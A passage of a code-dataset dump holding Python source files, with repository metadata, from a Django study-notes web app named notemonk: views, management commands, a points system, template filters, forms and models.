== 'POST':\r\n title = request.POST.get('title', 'attachment')\r\n description = request.POST.get('description', '')\r\n url = request.POST.get('url', '')\r\n\r\n if not attachment.uploaded_file and not url:\r\n error = True\r\n\r\n if not title.strip():\r\n error = True\r\n\r\n if not error:\r\n attachment.title = title\r\n attachment.description.raw = description\r\n if url:\r\n attachment.url = url\r\n attachment.save()\r\n\r\n return HttpResponseRedirect(reverse('attachment_page',\r\n kwargs={'attachment_id': attachment.id}))\r\n\r\n else:\r\n return render_response(request, 'ui/attachment_edit.html',\r\n {'attachment': attachment, 'page_title': page_title})\r\n\r\n@custom_login_required\r\ndef comment_add_view(request, target_type, target):\r\n next = request.GET.get('next', '')\r\n\r\n if request.method == 'POST':\r\n text = request.POST.get('text', '').strip()\r\n\r\n if text:\r\n target = get_target(target_type, target)\r\n comment = target.add_comment(user=request.user, text=text)\r\n\r\n followers = get_followers(request.user.get_profile(), target)\r\n notification.send(followers, 'comment_add', {'comment': comment})\r\n\r\n ac = Activity.add(request.user, comment)\r\n\r\n if request.user != target.user:\r\n target.user.get_profile().stream.add(ac)\r\n\r\n if isinstance(target, ProfilePost) and request.user != target.profile.user:\r\n target.profile.stream.add(ac)\r\n\r\n add_to_book_stream(target, ac)\r\n\r\n return HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef comment_edit_view(request, comment_id):\r\n pass\r\n\r\ndef profilepost_view(request, profilepost_id):\r\n profilepost = ProfilePost.objects.get(id=profilepost_id)\r\n page_user = profilepost.user\r\n\r\n title = \"%s's %s\" % (profilepost.user.get_profile().title, 'ProfilePost')\r\n page_title = PTITLE % title\r\n\r\n return render_response(request, 'ui/profilepost.html',\r\n {'profilepost': profilepost, 'page_title': page_title,\r\n 'page_user': page_user,})\r\n\r\n@custom_login_required\r\ndef profilepost_add_view(request, profile_id):\r\n next = request.GET.get('next', '')\r\n profile = UserProfile.objects.get(id=profile_id)\r\n\r\n if request.method == 'POST':\r\n text = request.POST.get('text', '').strip()\r\n\r\n if text:\r\n post = ProfilePost.objects.create(user=request.user, text=text,\r\n profile=profile)\r\n post.rate_up(request.user)\r\n post.save()\r\n\r\n followers = get_followers(profile, request.user.get_profile())\r\n notification.send(followers, 'ppost_add', {'post': post})\r\n\r\n ac = Activity.add(request.user, post)\r\n\r\n if profile.user != request.user:\r\n profile.stream.add(ac)\r\n\r\n return HttpResponseRedirect(next)\r\n\r\n@custom_login_required\r\ndef profilepost_edit_view(request, post_id):\r\n pass\r\n\r\nALLITEMS_MAP = {'questions': Question, 'notes': Note, 'videos': AssociatedMedia}\r\ndef allitems_view(request, u_items=None, order='recent', page_no=1, num=ITEMS_PER_PAGE):\r\n\r\n if u_items not in ALLITEMS_MAP:\r\n return render_error(request, 'Unable to display items')\r\n\r\n klass = ALLITEMS_MAP[u_items]\r\n qorder = '-date_added' if order == 'recent' else '-score'\r\n items = klass.objects.all().order_by(qorder)\r\n items = make_paginator(items, page_no, num)\r\n\r\n title = '%s %s' % (order.capitalize(), u_items.capitalize())\r\n page_title = PTITLE % title\r\n paging_url = '/%s/all/%s/<PAGENO>/' % (u_items, order)\r\n return render_response(request, 'ui/allitems.html',\r\n {'page_title': page_title, 'items': items,\r\n 'paging_url': paging_url, 'title': title,\r\n 'u_items': u_items, 'order': order})\r\n\r\ndef handler_500(request):\r\n t = template.loader.get_template('ui/500.html')\r\n context = RequestContext(request, {})\r\n context['ref_path'] = '/'\r\n return HttpResponseServerError(t.render(context))\r\n\r\ndef handler_404(request):\r\n return render_response(request, 'ui/404.html')\r\n\r\ndef xd_receiver_view(request):\r\n return render_response(request, 'xd_receiver.htm')\r\n\r\n"
},
{
"alpha_fraction": 0.6926910281181335,
"alphanum_fraction": 0.6976743936538696,
"avg_line_length": 59.20000076293945,
"blob_id": "b70d7a293cb34862c84fc69fd4aee10177f9e812",
"content_id": "940daf87afa1c516f002e1a8f3eca2cc0d2b3603",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1204,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 20,
"path": "/www/core/management/commands/create_cronjobs.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\nfrom django.utils.translation import ugettext_noop as _\nfrom chronograph.models import Job\n\nclass Command(BaseCommand):\n help = 'Creates cronjobs in chronograph. Run once at installation time.'\n args = ''\n\n def handle(self, *args, **options):\n cron = lambda **kwargs: Job.objects.create(**kwargs)\n\n cron(name='Send Mails', frequency='MINUTELY', params='interval:1', command='send_mail', args='', disabled=False)\n cron(name='Process Ratings', frequency='MINUTELY', params='interval:1', command='process_ratings', args='', disabled=False)\n cron(name='Process Toppers', frequency='HOURLY', params='interval:1', command='process_toppers', args='', disabled=False)\n cron(name='Process Onliners', frequency='HOURLY', params='interval:1', command='process_onliners', args='', disabled=False)\n cron(name='Emit Notices', frequency='MINUTELY', params='interval:1', command='emit_notices', args='', disabled=False)\n cron(name='Update Leaderboard Data', frequency='HOURLY', params='interval:2', command='update_leaderboarddata', args='', disabled=False)\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.5744985938072205,
"alphanum_fraction": 0.5816618800163269,
"avg_line_length": 28.08333396911621,
"blob_id": "75872d6ec989731034c8186f657da46a66f86c0a",
"content_id": "81fabdb3dc07c3d9fb4484c51ebfc265043e2a5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2094,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 72,
"path": "/www/scripts/load_outline.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport re\nimport sys\nfrom pprint import pprint\n\nfrom core.models import *\nfrom django.core.files.base import ContentFile\n\ndef parse_book_data(book):\n book = book.strip().split('\\n')\n name = book[0]\n book_file = book[1]\n image_file = book[2]\n \n data = book[3:]\n data = _parse_book_data(data, 0, 0)\n return name, book_file, image_file, data\n\ndef _parse_book_data(data, index, prev_indent):\n\n out = []\n\n cur_indent = prev_indent\n for index, d in enumerate(data):\n if d is None:\n continue\n cur_indent = len(re.findall('^ *', d)[0])\n if cur_indent > prev_indent:\n cdata = _parse_book_data(data, index, cur_indent)\n out[-1][1].extend(cdata)\n elif cur_indent == prev_indent:\n out.append([d.strip(), []])\n data[index] = None\n else:\n return out\n\n return out\n\ndef add_to_db(name, book_file, image_file, outline):\n b = Book.objects.create(title=name, followcount=0, flagcount=0)\n content = ContentFile(open(book_file, 'rb').read())\n thumbnail = ContentFile(open(image_file, 'rb').read())\n \n b.file.save(name+'.zip', content, save=True)\n b.cover_image.save(name+'.jpg', thumbnail, save=True) \n _add_to_db(b, outline, None)\n\ndef _add_to_db(book, data, parent):\n for index, (node, children) in enumerate(data):\n try: print 'Node: ', node\n except: pass\n n = Node.objects.create(title=node, parent=parent,\n book=book, order=index)\n _add_to_db(book, children, n)\n\ndef main(stream):\n books = stream.read().strip().split('\\n\\n')\n\n for book in books:\n name, book_file, image_file, outline = parse_book_data(book)\n try: print 'Book: ', name\n except: pass\n add_to_db(name, book_file, image_file, outline)\n\nif __name__ == '__main__':\n if len(sys.argv) < 2:\n print 'usage: python %s <book-data-file>' % sys.argv[0]\n sys.exit(1)\n\n books_data_file = sys.argv[1]\n stream = open(books_data_file).read()\n main(stream)\n"
},
{
"alpha_fraction": 0.6654545664787292,
"alphanum_fraction": 0.6690909266471863,
"avg_line_length": 31.352941513061523,
"blob_id": "b630dfe0607945b9f750894f8eea85be67b6ef3f",
"content_id": "020624a3a1e319167d6129c25ba743034468074f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 550,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 17,
"path": "/www/core/management/commands/process_toppers.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\nfrom core.models import *\n\nclass Command(BaseCommand):\n help = 'Process who are toppers and update in Toppers table for quick retrieval.'\n args = ''\n\n def handle(self, *args, **options):\n \n user_profiles = UserProfile.objects.filter(user__is_staff=False).order_by('-points')[:20]\n Toppers.objects.all().delete()\n\n for user_profile in user_profiles:\n Toppers.objects.create(user_profile = user_profile)\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.6616822481155396,
"alphanum_fraction": 0.6691588759422302,
"avg_line_length": 27.157894134521484,
"blob_id": "d1f76a728b6599d3ed54e9aed3be624f42b5a214",
"content_id": "24496975ab5aad0068ca155e62128dabeed767e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 535,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 19,
"path": "/www/core/management/commands/process_ratings.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\nfrom core.models import *\nfrom core.points import give_points\n\nMAX_NOTIFICATIONS = 1000\n\nclass Command(BaseCommand):\n help = 'Process Rating Notifications and award User Points.'\n args = ''\n\n def handle(self, *args, **options):\n rns = RatingNotification.objects.all()[:MAX_NOTIFICATIONS]\n\n for rn in rns:\n give_points('rated', target=rn.target, num_ratings=rn.num_ratings)\n rn.delete()\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.5279766917228699,
"alphanum_fraction": 0.5335454940795898,
"avg_line_length": 28.007692337036133,
"blob_id": "796942a6ac6b2bc71b42d8cff36fea4a9c168153",
"content_id": "695a7677b4187f8de0cbc4a256005ba6a0c60d2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3771,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 130,
"path": "/www/core/points.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "'''\nUser points, badges and awards system.\n'''\n\nfrom django.contrib.auth.models import User\nfrom models import *\n\nLEVEL_POINTS_PERCENT = .05\n\nRATING_MULTIPLIER = {\n Book: 4,\n Note: 2,\n AssociatedMedia: 2,\n Answer: 2,\n Question: 1,\n UserProfile: 1,\n }\n\ndef get_obj(klass, id):\n return klass.objects.get(pk=id)\n\nclass PointsSystem:\n @staticmethod\n def answer_add(code, data, user, answer):\n pass\n\n @staticmethod\n def video_add(code, data, user, avideo):\n pass\n\n @staticmethod\n def note_add(code, data, user, note):\n pass\n\n @staticmethod\n def question_add(code, data, user, question):\n pass\n\n @staticmethod\n def rated(code, data, target, num_ratings):\n\n level = Rateable.LEVELS.index(num_ratings) + 1\n\n if isinstance(target, ProfilePost):\n # no points for rating profile posts\n return\n\n ratings = target.ratings.order_by('date_added')[:num_ratings]\n value = sum(r.rating for r in ratings)\n\n if not value:\n return\n\n norm_value = value / value\n value = norm_value if value > 0 else -norm_value\n\n for index, r in enumerate(ratings):\n user_rating_level = PointsSystem._get_rating_level(index)\n level_diff = (level - user_rating_level) + 1\n\n rating_multiplier = 1\n if index == 0 and target.__class__ != UserProfile:\n # multiplier only for owner of item\n rating_multiplier = RATING_MULTIPLIER.get(target.__class__, 1)\n\n points = 1 if r.rating == value else -1\n points = points * level_diff * rating_multiplier\n\n userp = r.user.get_profile()\n userp.give_points(points)\n userp.save()\n\n data = {'target_type': target.ctype.id,\n 'target': target.id,\n 'num_ratings': num_ratings,\n 'position': index,\n 'rated_at_level': user_rating_level,\n 'current_level': level,\n 'level_diff': level_diff,\n 'rating_multiplier': rating_multiplier}\n \n p = PointsHistory.objects.create(user=r.user, points=points,\n code=code, data=repr(data))\n \n Activity.add(r.user, p)\n\n @staticmethod\n def _get_rating_level(count):\n for index, level_start in enumerate(Rateable.LEVELS):\n if count < level_start:\n return index + 1\n\n return len(Rateable.LEVELS) + 1\n\n @staticmethod\n def user_level_changed(code, data, user, prev_level, level):\n user = get_obj(User, user)\n \n if level > prev_level:\n level_score = UserProfile.LEVELS[level]\n sign = +1\n\n else:\n level_score = UserProfile.LEVELS[prev_level]\n sign = -1\n \n points = level_score * LEVEL_POINTS_PERCENT\n points = int(points) or 1\n points = sign * points\n\n referrer = user.get_profile().referrer\n if not referrer:\n return\n\n referrer = referrer.get_profile()\n referrer.give_points(points)\n referrer.save()\n\n p = PointsHistory.objects.create(user=referrer.user, points=points,\n code=code, data=data)\n\n Activity.add(referrer.user, p)\n\n @staticmethod\n def dummy(code, data, **kwargs):\n return\n\ndef give_points(code, **kwargs):\n points_fn = getattr(PointsSystem, code, PointsSystem.dummy)\n points_fn(code, repr(kwargs), **kwargs)\n"
},
{
"alpha_fraction": 0.5974882245063782,
"alphanum_fraction": 0.6025117635726929,
"avg_line_length": 21.429576873779297,
"blob_id": "5a627dd9e5e1a64bcca2be33eff2cb1ba73f74ea",
"content_id": "b8adaaa440910ff33b90823722bcc02aca88b5be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3185,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 142,
"path": "/www/core/templatetags/filters.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import re\n\nfrom django.template import Library\nfrom django.template.defaultfilters import timesince, truncatewords, truncatewords_html\nfrom django.utils.safestring import mark_safe\n\nregister = Library()\n\[email protected]\ndef gt(value, arg):\n return value > int(arg)\n\[email protected]\ndef lt(value, arg):\n return value < int(arg)\n\[email protected]\ndef gte(value, arg):\n return value >= int(arg)\n\[email protected]\ndef lte(value, arg):\n return value <= int(arg)\n\[email protected]\ndef length_gt(value, arg):\n return len(value) > int(arg)\n\[email protected]\ndef length_lt(value, arg):\n return len(value) < int(arg)\n\[email protected]\ndef length_gte(value, arg):\n return len(value) >= int(arg)\n\[email protected]\ndef length_lte(value, arg):\n return len(value) <= int(arg)\n\[email protected]\ndef cname(value, arg=None):\n return value.__class__.__name__\n\[email protected]\ndef strip_p(value, arg=None):\n value = value.rendered.strip()\n if value.lower().count('<p>') == 1:\n value = re.sub('^<p>(?i)', '', value)\n value = re.sub('</p>$(?i)', '', value)\n return mark_safe(value.strip())\n\[email protected]\ndef brief(value, arg='p'):\n value = value.rendered.strip()\n nvalue = value\n\n if '<p>' in nvalue.lower():\n values = re.findall('<p>(.*?)</p>(?is)', nvalue)\n nvalue = values[0].strip() if values else nvalue\n\n if arg.isdigit():\n CHARS_PER_WORD = 8\n ntvalue = truncatewords_html(nvalue, int(arg)/CHARS_PER_WORD)\n if ntvalue == nvalue and value != nvalue:\n value = ntvalue + ' ...'\n else:\n value = ntvalue\n\n elif value != nvalue:\n value = nvalue + ' ...'\n\n return mark_safe(value)\n\[email protected]\ndef dt(value, arg=None):\n x = '<span title=\"%s\" class=\"light\">%s ago</span>' % (value.isoformat(), timesince(value))\n return mark_safe(x)\n\[email protected]\ndef nth(value, arg=None):\n value = str(value)\n\n if value == '1':\n s = 'st'\n\n elif value.endswith('2'):\n s = 'nd'\n\n elif value.endswith('3'):\n s = 'rd'\n\n else:\n s = 'th'\n\n return value + s\n\[email protected]\ndef add(value, arg=0):\n if isinstance(value, (str, unicode)) and value.isdigit():\n value = int(value)\n else:\n return value\n\n if not isinstance(value, int):\n return value\n\n return value + arg\n\[email protected]\ndef truncatesmart(value, limit=80):\n \"\"\"\n FROM: http://www.djangosnippets.org/snippets/1259/\n Truncates a string after a given number of chars keeping whole words.\n \n Usage:\n {{ string|truncatesmart }}\n {{ string|truncatesmart:50 }}\n \"\"\"\n \n try:\n limit = int(limit)\n # invalid literal for int()\n except ValueError:\n # Fail silently.\n return value\n \n # Make sure it's unicode\n value = unicode(value)\n \n # Return the string itself if length is smaller or equal to the limit\n if len(value) <= limit:\n return value\n \n # Cut the string\n value = value[:limit]\n \n # Break into words and remove the last\n words = value.split(' ')[:-1]\n \n # Join the words and return\n return ' '.join(words) + '...'\n"
},
{
"alpha_fraction": 0.4865567982196808,
"alphanum_fraction": 0.48872506618499756,
"avg_line_length": 35.619049072265625,
"blob_id": "9ca558034c3098f2ba4451fe924c3862ceae532b",
"content_id": "6ce4f9934303cb777740ad65ddfafd82de6a1993",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2306,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 63,
"path": "/www/core/auth_backends.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import urllib2\n\nfrom django.contrib.auth.models import User\nfrom django.core.files.base import ContentFile\n\nfrom core.models import FBUserProfile\n\nclass FacebookBackend:\n def authenticate(self, request):\n fb_user = request.facebook.users.getLoggedInUser()\n \n try:\n profile = FBUserProfile.objects.get(uid=str(fb_user))\n return profile.user\n except FBUserProfile.DoesNotExist:\n fb_data = request.facebook.users.getInfo([fb_user], ['uid',\n 'username', 'email', 'about_me',\n 'first_name', 'last_name',\n 'pic_big', 'pic', 'pic_small',\n 'current_location', 'profile_url'])\n\n if not fb_data:\n return None\n\n fb_data = fb_data[0]\n username = 'fb.%s' % (fb_data['username'] or fb_data['uid'])\n user_email = fb_data['email'] or ''\n user = User.objects.create(username=username)\n user.first_name = fb_data['first_name']\n user.last_name = fb_data['last_name']\n user.save()\n\n FBUserProfile.objects.create(uid=str(fb_user), user=user)\n\n user_profile = user.get_profile()\n\n location = fb_data['current_location']\n if location:\n user_profile.city = location['city']\n user_profile.state = location['state']\n user_profile.country = location['country']\n user_profile.save()\n\n image_url = fb_data['pic_big']\n if image_url:\n try:\n image_ext = image_url.rsplit('.', 1)[-1]\n except IndexError:\n image_ext = 'jpg'\n \n image = urllib2.urlopen(image_url)\n cfile = ContentFile(image.read())\n \n image_name = '%s.%s' % (username, image_ext)\n user_profile.image.save(image_name, cfile, save=True)\n\n return user\n\n def get_user(self, user_id):\n try:\n return User.objects.get(pk=user_id)\n except User.DoesNotExist:\n return None"
},
{
"alpha_fraction": 0.6881029009819031,
"alphanum_fraction": 0.6913183331489563,
"avg_line_length": 33.55555725097656,
"blob_id": "94174f294e9cdfe7be6879adc6ba146830b1b75e",
"content_id": "4116b4591ff117e43aeee002069643a0bd36a8e9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 9,
"path": "/www/core/debug.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.db import connection\nfrom django.conf import settings\n\nclass SqlPrintingMiddleware(object):\n def process_response(self, request, response):\n if len(connection.queries) > 0 and settings.DEBUG:\n for query in connection.queries:\n print query\n return response\n"
},
{
"alpha_fraction": 0.6392857432365417,
"alphanum_fraction": 0.6392857432365417,
"avg_line_length": 22.33333396911621,
"blob_id": "b93d0a4b6bd3b77adbe4e27be2631602b7a3855b",
"content_id": "b25f342267a189740c0604c1faafc628ae4ecb29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 12,
"path": "/www/core/management/commands/sample.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from django.core.management.base import BaseCommand\n\nclass Command(BaseCommand):\n help = \"command name is 'sample'\"\n args = ''\n\n def handle(self, *args, **options):\n from django.conf import settings\n pass\n\n def usage(self, subcommand):\n return ''\n"
},
{
"alpha_fraction": 0.6198542714118958,
"alphanum_fraction": 0.6420764923095703,
"avg_line_length": 37.39160919189453,
"blob_id": "0de0ddd114f9f174b0d74fee4cfbe062bd9216fb",
"content_id": "24fa903126d36d851025f056cc7387e84b8591fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5490,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 143,
"path": "/www/core/forms.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "import new\n\nfrom django import forms\n\nfrom registration.forms import RegistrationFormUniqueEmail\nfrom notification.models import NoticeType\n\nW_TEXT = lambda s=40: forms.TextInput(attrs={'size':str(s)})\n\nclass RegistrationForm(RegistrationFormUniqueEmail):\n BLOCKED_USERNAMES = ['notemonk', 'adminmonk', 'support', 'contact',\n 'register', 'administrator', 'registrar', 'superuser', 'webmaster',\n 'anonymous', 'anonymoususer']\n\n referrer = forms.CharField(max_length=50, required=False)\n\n def clean_username(self):\n username = RegistrationFormUniqueEmail.clean_username(self)\n\n if not 6 < len(username) < 30:\n raise forms.ValidationError('Sorry, your username must be between 6 and 30 characters long')\n\n if username in self.BLOCKED_USERNAMES:\n raise forms.ValidationError('A user with that username already exists.')\n\n return username\n\nclass LoginForm(forms.Form):\n username = forms.CharField(max_length=50)\n password = forms.CharField(max_length=50, widget=forms.PasswordInput)\n persistent = forms.BooleanField(required=False, label='Stay signed in')\n\nclass UserProfileForm(forms.Form):\n first_name = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n last_name = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n email = forms.EmailField(widget=W_TEXT(30))\n password1 = forms.CharField(widget=forms.PasswordInput(attrs={'size':'30'}),\n required=False, label='Password')\n password2 = forms.CharField(widget=forms.PasswordInput(attrs={'size':'30'}),\n required=False, label='Password (re-enter)')\n institution = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n city = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n state = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n country = forms.CharField(max_length=50, required=False, widget=W_TEXT(30))\n mailing_address = forms.CharField(max_length=1024, widget=forms.Textarea, required=False)\n dob = forms.DateField(required=False, label='Birth date',\n help_text=\"eg: '10/25/06', '10/25/2006', '2006-10-25' \",\n widget=W_TEXT(30))\n sex = forms.ChoiceField(required=False)\n sex.choices = [('M', 'Male'), ('F', 'Female')]\n image = forms.ImageField(required=False)\n\n def clean(self):\n cleaned_data = self.cleaned_data\n password1 = cleaned_data.get('password1')\n password2 = cleaned_data.get('password2')\n\n if password1:\n if password1 != password2:\n del cleaned_data['password1']\n del cleaned_data['password2']\n raise forms.ValidationError('passwords do not match')\n\n return cleaned_data\n\nclass FeedbackForm(forms.Form):\n name = forms.CharField(max_length=100)\n email = forms.EmailField()\n feedback = forms.CharField(max_length=2048, widget=forms.Textarea)\n\nclass EmailForm(forms.Form):\n email = forms.EmailField(widget=W_TEXT())\n re_enter_email = forms.EmailField(label='Re-enter Email',\n widget=W_TEXT())\n\nclass InviteForm(forms.Form):\n emails = forms.CharField(max_length=2048, widget=forms.Textarea,\n help_text=\"Separate emails by ;\")\n message = forms.CharField(max_length=1024, widget=forms.Textarea,\n required=False)\n\nclass DynForm(forms.Form): \n \n def set_fields(self, fields):\n for k, f in fields:\n self.fields[k] = f\n\ndef make_notifications_form(data):\n klass = new.classobj('NotificationsForm', (DynForm,), {})\n obj = klass()\n\n for n in NoticeType.objects.all():\n if n.label.startswith('_'):\n continue\n \n field = forms.BooleanField(label = n.display,\n required=False, initial=data.get(n.label, False))\n\n obj.fields[n.label] = field\n\n return obj\n\nclass AddBookForm(forms.Form):\n title = forms.CharField(max_length=255, widget=W_TEXT())\n isbn = forms.CharField(max_length=32, required=False, widget=W_TEXT())\n\n tags = forms.CharField(max_length=1024,\n widget=forms.TextInput(\n attrs={'style': 'display: none'}))\n\n def clean_tags(self):\n tags = self.cleaned_data['tags']\n tags = [int(t.strip()) for t in tags.split(',') if t.strip()]\n tags = list(set(tags))\n return tags\n\nclass EditBookForm(forms.Form):\n title = forms.CharField(max_length=255)\n isbn = forms.CharField(max_length=30, required=False)\n image = forms.ImageField(required=False)\n\n tags = forms.CharField(max_length=1024,\n widget=forms.TextInput(\n attrs={'style': 'display: none'}))\n\n moderators = forms.CharField(max_length=1024, required=False,\n widget=forms.TextInput(\n attrs={'style': 'display: none'}))\n\n def clean_tags(self):\n tags = self.cleaned_data['tags']\n tags = [int(t.strip()) for t in tags.split(',') if t.strip()]\n tags = list(set(tags))\n return tags\n \n def clean_moderators(self):\n moderators = self.cleaned_data['moderators']\n moderators = [int(m.strip()) for m in moderators.split(',') if m.strip()]\n moderators = list(set(moderators))\n return moderators\n\nclass MailingAddressForm(forms.Form):\n mailing_address = forms.CharField(max_length=1024, widget=forms.Textarea, required=True)\n"
},
{
"alpha_fraction": 0.5850151181221008,
"alphanum_fraction": 0.5906693935394287,
"avg_line_length": 29.192455291748047,
"blob_id": "3af3ab2ddbe9102b0e0eadd90bfac9494f696837",
"content_id": "8191c7e86d051acc3f63902778aa7e3bc62b1709",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 47221,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 1564,
"path": "/www/core/models.py",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "from decimal import Decimal\nfrom itertools import groupby\n\nimport simplejson as json\nimport Image\n\nfrom django.db import models, IntegrityError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes import generic\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models.signals import post_save\nfrom django import template\n\nimport reversion\nimport notification.models as notification\nfrom markitup.fields import MarkupField\n\nfrom core.utils import xcode, urlsafe, get_target, HANDLING_CREDITS\nfrom core.utils import make_context, QuerySetFilter, parse_flags\n\nQ = models.Q\nLIMIT = 50\n\ndef user_post_save_handler(**kwargs):\n \n obj = kwargs['instance']\n \n if not isinstance(obj, User):\n return\n \n if 'created' not in kwargs:\n return\n \n if not kwargs['created']:\n return\n \n try:\n profile = UserProfile.objects.get(user=obj)\n except ObjectDoesNotExist:\n profile = UserProfile.objects.create(user=obj)\n stream = Stream.objects.create(title='for user: %s' % obj.username)\n profile.stream = stream\n profile.save()\n\n Note.add(profile, user=obj)\n\n followers = User.objects.filter(is_superuser=True)\n notification.send(followers, '_user_joined', {'user': obj})\n\npost_save.connect(user_post_save_handler)\n\ndef get_book(object):\n target = object\n\n while target:\n if isinstance(target, Book):\n return target\n \n target = getattr(target, 'target', None)\n\nclass Titled(models.Model):\n title = models.CharField(max_length=255)\n \n class Meta:\n abstract = True\n\nclass Editable(models.Model):\n def is_editable_by(self, user):\n return user.is_superuser or user.is_staff or user == self.user\n\n @property\n def edit_link(self):\n return ''\n \n class Meta:\n abstract = True\n\nclass Referred(models.Model):\n @property\n def ctype(self):\n return ContentType.objects.get_for_model(self)\n\n class Meta:\n abstract = True\n\nclass Followable(models.Model):\n followcount = models.IntegerField(db_index=True, default=0)\n\n followers = generic.GenericRelation('Follows',\n content_type_field='target_type',\n object_id_field='target_id')\n\n class Meta:\n abstract = True\n\n def follow(self, user):\n try:\n f = self.followers.create(user=user)\n self.followcount += 1\n self.save()\n return f\n except IntegrityError:\n # Model has already been followed by this user\n # No more action is required. Ignore.\n pass\n\n def unfollow(self, user):\n try:\n obj = self.followers.get(user=user).delete()\n self.followcount -= 1\n self.save()\n except IntegrityError:\n # Model has already been followed by this user\n # No more action is required. Ignore.\n pass\n\n def unfollow(self, user):\n try:\n obj = self.followers.get(user=user).delete()\n self.followcount -= 1\n self.save()\n except ObjectDoesNotExist:\n # Model has not been followed by this user\n # No more action is required. Ignore.\n pass\n\n def followed_by(self, user):\n return True if self.followers.filter(user=user) else False\n\n @property\n def followers_link(self):\n return '/followers/%d/%d/' % (self.ctype.id, self.id)\n\nclass Rateable(models.Model):\n LEVELS = [2, 10, 50, 100, 1000, 10000, 100000, 1000000,\n 10000000, 100000000, 1000000000]\n\n tot_count = models.IntegerField(db_index=True, default=0)\n up_count = models.IntegerField(db_index=True, default=0)\n down_count = models.IntegerField(db_index=True, default=0)\n score = models.IntegerField(db_index=True, default=0)\n\n ratings = generic.GenericRelation('Ratings',\n content_type_field='target_type',\n object_id_field='target_id')\n\n class Meta:\n abstract = True\n\n def notify_rating(self):\n if self.tot_count not in self.LEVELS:\n return\n\n RatingNotification.objects.create(target_type=self.ctype, target_id=self.id,\n num_ratings=self.tot_count)\n\n def rate_up(self, user):\n try:\n r = self.ratings.create(user=user, rating=Ratings.UP)\n self.tot_count += 1\n self.up_count += 1\n self.score += 1\n self.notify_rating()\n return r\n except IntegrityError:\n # Model has already been rated by this user\n pass\n\n def rate_down(self, user):\n try:\n r = self.ratings.create(user=user, rating=Ratings.DOWN)\n self.tot_count += 1\n self.down_count += 1\n self.score -= 1\n self.notify_rating()\n return r\n except IntegrityError:\n # Model has already been rated by this user\n pass\n\n @property\n def level(self):\n tot_count = self.tot_count\n\n for index, level_start in enumerate(self.LEVELS):\n if tot_count < level_start:\n return index + 1\n\n return len(self.LEVELS) + 1\n\nclass Flaggable(models.Model):\n flagcount = models.IntegerField(db_index=True, default=0)\n\n flaggers = generic.GenericRelation('Flags',\n content_type_field='target_type',\n object_id_field='target_id')\n\n class Meta:\n abstract = True\n\n def flag(self, user):\n try:\n f = self.flaggers.create(user=user)\n self.flagcount += 1\n return f\n except IntegrityError:\n # Model has already been flagged by this user\n # No more action is required. Ignore.\n pass\n\n def unflag(self, user):\n try:\n obj = self.flaggers.get(user=user).delete()\n self.flagcount -= 1\n except ObjectDoesNotExist:\n # Model has not been flagged by this user\n # No more action is required. Ignore.\n pass\n\nclass HasComments(models.Model):\n commentcount = models.IntegerField(db_index=True, default=0)\n\n comments = generic.GenericRelation('Comment',\n content_type_field='target_type',\n object_id_field='target_id')\n\n class Meta:\n abstract = True\n\n def add_comment(self, user, text):\n comment = self.comments.create(user=user, text=text)\n self.commentcount += 1\n self.save()\n return comment\n\nclass RateFlag(Rateable, Flaggable):\n class Meta:\n abstract = True\n\nclass Linkable(models.Model):\n @property\n def link(self):\n pass\n\n class Meta:\n abstract = True\n\nclass Tagable(models.Model):\n tags = generic.GenericRelation('TagItem',\n content_type_field='item_type',\n object_id_field='item_id')\n\n class Meta:\n abstract = 